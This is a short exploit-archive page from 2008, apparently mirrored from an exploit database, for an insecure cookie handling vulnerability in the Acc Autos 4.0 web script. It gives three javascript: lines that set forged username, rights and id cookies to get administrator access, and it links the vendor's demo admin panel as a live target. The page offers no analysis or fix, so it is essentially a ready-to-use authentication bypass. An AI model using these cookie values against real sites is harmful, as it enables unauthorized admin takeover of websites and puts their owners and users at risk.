[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Acc Autos 4.0 Insecure Cookie Handling Vulnerability
# Published : 2008-11-03
# Author : x0r
# Previous Title : MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
# Next Title : Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability


-==========================================-
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug:  Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
-==========================================-
Exploit:

[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";

Live Demo:

http://www.accscripts.com/autos/demo/admin/

Greetz: 8102008..Il Sogni Diventa Realt??...Bimb4 Ti AmO.

# www.Syue.com [2008-11-03]